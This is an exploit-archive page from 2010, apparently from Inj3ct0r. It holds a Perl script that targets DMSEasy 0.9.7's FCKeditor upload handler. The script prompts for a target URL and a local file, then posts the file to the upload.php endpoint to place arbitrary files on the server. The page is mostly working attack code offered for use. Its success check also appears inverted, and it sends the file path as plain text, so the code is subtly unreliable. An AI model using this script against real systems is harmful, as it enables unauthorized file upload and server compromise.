DMSEasy0.9.7 (fckeditor) Arbitrary File Upload

Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>DMSEasy0.9.7 (fckeditor) Arbitrary File Upload</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================
DMSEasy0.9.7 (fckeditor) Arbitrary File Upload
==============================================


#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print &lt;&lt;INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+   DMSEasy0.9.7 (fckeditor) Arbitrary File Upload  +
+                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print &quot;Enter URL(ie: http://target.com): &quot;;
    chomp(my $url=&lt;STDIN&gt;);
   
print &quot;Enter File Path(path to local file to upload): &quot;;
    chomp(my $file=&lt;STDIN&gt;);
my $ua = LWP::UserAgent-&gt;new;
my $re = $ua-&gt;request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type =&gt; 'form-data',
                      Content      =&gt; [ NewFile =&gt; $file ] );
if($re-&gt;is_success) {
    if( index($re-&gt;content, &quot;Disabled&quot;) != -1 ) { print &quot;Exploit Successfull! File Uploaded!
&quot;; }
    else { print &quot;File Upload Is Disabled! Failed!
&quot;; }
} else { print &quot;HTTP Request Failed!
&quot;; }
exit;



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20